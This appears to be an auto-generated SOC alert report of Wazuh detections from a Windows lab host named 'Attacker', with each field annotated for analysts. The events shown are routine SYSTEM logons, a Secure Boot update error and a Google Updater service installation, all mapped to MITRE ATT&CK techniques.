🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:29.083+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:29.083+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533889.127951
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:42:50.7769481Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43478
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length of the session key negotiated during logon (e.g., 128‑bit); 0 means no session key was requested. Unexpectedly weak keys can point to downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:29.973+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:29.973+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533889.135289
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:42:59.1075434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43480
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length of the session key negotiated during logon (e.g., 128‑bit); 0 means no session key was requested. Unexpectedly weak keys can point to downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:30.740+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:30.740+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533890.142627
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-TPM-WMI
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {7d5387b0-cbe0-11da-a94d-0800200c9a66}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1796
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:55.0846511Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2913
Incremental log record number – handy for timeline order.

data.win.system.processID:  14920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3420
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hResult:  -2147020471
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:31:31.273+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:31.273+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533891.144212
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.3145318Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2915
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0) Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  user mode service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.accountName:  LocalSystem
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:32.597+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:32.597+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533892.146887
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:28.0949229Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43488
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

